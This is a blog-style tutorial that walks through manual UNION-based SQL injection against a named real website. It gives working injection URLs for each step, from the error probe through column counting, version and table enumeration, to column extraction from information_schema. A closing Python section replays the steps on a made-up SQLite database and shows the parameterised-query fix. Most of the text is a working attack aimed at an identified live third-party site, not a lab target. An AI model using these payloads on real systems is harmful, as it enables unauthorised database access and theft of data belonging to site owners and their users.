Hey guys! It has taken me a long time to get some new material to you, so today I thought I would teach you something interesting. Of the tens of millions of sites on the internet, a large fraction (figures of around 16% have been claimed) are vulnerable to SQL injection. In this article I will explain what SQL injection is, how it works and how to perform it by hand. I have already covered some basics in my last article, and I advise you to take a look at it before you continue reading this one.
Today we are gonna access the database of a European site http://www.adas-fusion.eu/
Recently I have found a link vulnerable to SQL injection.
What is SQL Injection?
SQL injection is an attack that exploits a flaw in the way a web application builds its database queries. The flaw occurs when user-supplied input (a URL parameter, a form field, a cookie) is pasted straight into an SQL statement without being properly escaped or, better, passed as a bound parameter. Because the input is not filtered correctly, an attacker can end the value the developer intended and append SQL of their own, so the database (here MySQL) executes attacker-chosen commands. Taking advantage of this, an attacker can read data the page was never meant to show, and in many setups modify it or take control of the database server.
Anyway, I am just going to show you how to get access to the database and retrieve content from it. This will be explained manually, so you have to pay some attention. There are several tools that perform this attack automatically; all you need to do is give the tool a vulnerable link. Doing it by hand first is what lets you understand what those tools are actually sending.
So let’s get started!!!
Step 1: Checking if the link is vulnerable or not.
This is the vulnerable link of the site mentioned above: http://www.adas-fusion.eu/theme.php?id=2. To check whether the link is vulnerable, just add a single quote (') at the end of the parameter value. The link will then look like this:
http://www.adas-fusion.eu/theme.php?id=2'
When you open the link with the single quote added, you get an error saying:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
If the website displays a line like this, the quote reached the MySQL parser unescaped and broke the query, which means the site is vulnerable to SQL injection, and we can proceed to finding the number of columns. Note the reverse is not true: a page that shows no error may still be injectable (the application may simply hide database errors), it is just harder to confirm and you then need blind techniques.
Step 2: Finding the number of columns in the query.
This is the number of columns the vulnerable SELECT statement returns (not the number of columns in the whole database); we need it because a UNION in the next step must produce exactly as many columns as the original query. Open the link followed by "order by number--" where "number" is your guess at the column count. Start with 10, so the link looks like:
http://www.adas-fusion.eu/theme.php?id=2 order by 10--
The "--" turns the rest of the original query into a comment. In MySQL the double dash must be followed by a space, so if a plain "--" at the end of the URL still gives a syntax error, write it as "--+" (the + decodes to a space) or use "#" instead.
If the page shows an error (typically "Unknown column '10' in 'order clause'"), the real number of columns is smaller than the number you guessed. So try 9, 8, 7 and so on until you get a page without an error.
For this site you get an error up to 7, and at 6 the page displays properly without any error. Check it out here:
http://www.adas-fusion.eu/theme.php?id=2 order by 6--
So the query returns 6 columns!
Step 3: Finding the vulnerable columns
Now we append a UNION that selects six literal numbers, so that whichever of them appears in the rendered page tells us which column positions the page actually prints:
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,6--
After you open this link you will see the number 6 somewhere in the page, so column 6 is the one we can use to pull data out. If none of the numbers shows up, the page is probably only rendering the first row (the real one); the usual trick is to make the original WHERE clause match nothing, for example by using id=-2, so the UNIONed row is the only one left.
Step 4: Finding the version of the MySQL database.
The information_schema database that the next steps rely on only exists from MySQL 5.0 onwards. On older servers you cannot list tables and columns and have to guess their names instead, and when the page does not reflect query output at all you fall back to blind SQL injection. To read the version, put version() into the column we found, like this:
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,version()--
Here the version is 5.1.67, so this method works; let's move ahead.
Step 5: Retrieving the tables.
Now we use the group_concat(table_name) function, which joins all the table names into one comma-separated string so they fit in our single output column:
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,group_concat(table_name) from information_schema.tables--
After the page loads you get the list of tables. Note down the interesting ones. The names in capitals (CHARACTER_SETS, COLUMNS, TABLES and so on) are information_schema's own tables and are present on every MySQL 5 server, so the application data is usually in the lowercase tables, though not always. Two practical points: group_concat output is truncated at 1024 characters by default, so the end of a long list is cut off, and adding "where table_schema=database()" to the query restricts the listing to the tables of the database the site is actually using.
Step 6: Getting the columns and the data from a table.
This is the last step. First you need the column names of the table you noted in the previous step:
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,column_name from information_schema.columns where table_name=char(ASCII)--
Replace "ASCII" with the comma-separated ASCII codes of each character of the table name. char() is used instead of a quoted string so that no quote characters appear in the URL, since the application may escape or strip them. Online string-to-ASCII converters are available.
For the table task the codes are 116,97,115,107 (t, a, s, k), which gives:
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,column_name from information_schema.columns where table_name=char(116,97,115,107)--
This link lists the column names of the task table (use group_concat(column_name) to see all of them at once, otherwise only the first row is shown). With the table and column names known, the data itself comes from one more query of the same shape, selecting group_concat of the wanted columns from the task table in place of the information_schema lookup.
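Here is the whole procedure above, and the definition from the "What is SQL Injection?" section, replayed end to end in Python as an added example. It is not code from the original article and has nothing to do with the real site: it builds a made-up in-memory SQLite database (a public "theme" table and a private "task" table), exposes it through a deliberately vulnerable query that concatenates the id parameter just like a naive theme.php would, runs steps 1 to 6 against it, and then shows the parameterised fix. Because SQLite stands in for MySQL, sqlite_version() replaces version() and sqlite_master replaces information_schema; the function names, the schema, the sample rows and the assumption that the page template prints only the sixth column are all mine.

```python
"""Manual UNION-based SQL injection, replayed against a constructed SQLite db.
Added example, not the original article's code. SQLite differences from MySQL:
sqlite_version() instead of version(), sqlite_master instead of information_schema.
"""
import sqlite3

COLUMNS = "id,title,body,author,created,slug"  # six columns, as in the article


def make_db():
    """Constructed sample data (hypothetical schema, not any real site's)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE theme(id INTEGER, title TEXT, body TEXT, author TEXT,
                           created TEXT, slug TEXT);
        CREATE TABLE task(id INTEGER, name TEXT, owner TEXT, secret TEXT);
        INSERT INTO theme VALUES (2, 'Fusion', 'Some body text', 'editor',
                                  '2013-01-01', 'fusion');
        INSERT INTO task VALUES (1, 'deploy', 'alice', 's3cret');
    """)
    return conn


def vulnerable_page(conn, id_param):
    """Mimics theme.php?id=...: the raw parameter is concatenated into the SQL.
    Returns the rendered strings (assumption: the template prints only column 6)
    or the database error text, which the vulnerable app leaks to the client."""
    sql = f"SELECT {COLUMNS} FROM theme WHERE id={id_param}"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as e:
        return f"error: {e}"
    return [str(r[5]) for r in rows]


def safe_page(conn, id_param):
    """The fix: a bound parameter is sent as data and never parsed as SQL."""
    sql = f"SELECT {COLUMNS} FROM theme WHERE id=?"
    rows = conn.execute(sql, (id_param,)).fetchall()
    return [str(r[5]) for r in rows]


# ---- Step 1: a stray quote breaks the query and the error reaches the page --
def step1_probe(conn):
    return vulnerable_page(conn, "2'")


# ---- Step 2: ORDER BY n fails once n exceeds the query's column count --------
def step2_column_count(conn, start=10):
    for n in range(start, 0, -1):
        if not isinstance(vulnerable_page(conn, f"2 order by {n}--"), str):
            return n
    return None


# ---- Step 3: UNION literal numbers; the one that renders is usable ------------
def step3_reflected_columns(conn, n):
    nums = ",".join(str(i) for i in range(1, n + 1))
    out = vulnerable_page(conn, f"2 union all select {nums}--")
    return [int(s) for s in out if s.isdigit()]


def inject(conn, expr):
    """Put an arbitrary expression into the reflected 6th column. id=-2 makes the
    original WHERE match nothing, so the UNIONed row is the only one rendered."""
    return vulnerable_page(conn, f"-2 union all select 1,2,3,4,5,{expr}--")[0]


# ---- Steps 4-6: version, table list, column list, then the data itself --------
def step4_version(conn):
    return inject(conn, "sqlite_version()")


def step5_tables(conn):
    return inject(conn, "group_concat(name) from sqlite_master where type='table'")


def step6_columns(conn):
    # char(116,97,115,107) == 'task', spelled without quotes like the article does;
    # sqlite_master.sql holds the CREATE TABLE text, which names every column.
    return inject(conn, "sql from sqlite_master where name=char(116,97,115,107)")


def step6_data(conn):
    return inject(conn, "group_concat(owner||':'||secret) from task")


if __name__ == "__main__":
    db = make_db()
    print("probe :", step1_probe(db))
    print("cols  :", step2_column_count(db))
    print("shown :", step3_reflected_columns(db, 6))
    print("ver   :", step4_version(db))
    print("tables:", step5_tables(db))
    print("schema:", step6_columns(db))
    print("data  :", step6_data(db))
    print("fixed :", safe_page(db, "-2 union all select 1,2,3,4,5,6--"))
```

The last line is the point of the exercise: the same UNION payload that dumps the task table through vulnerable_page() returns nothing through safe_page(), because the driver sends it as a value compared against the id column rather than as SQL text. Escaping quotes would not have helped here, since the injected value contains no quote at all.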
That’s it… Feel free to comment!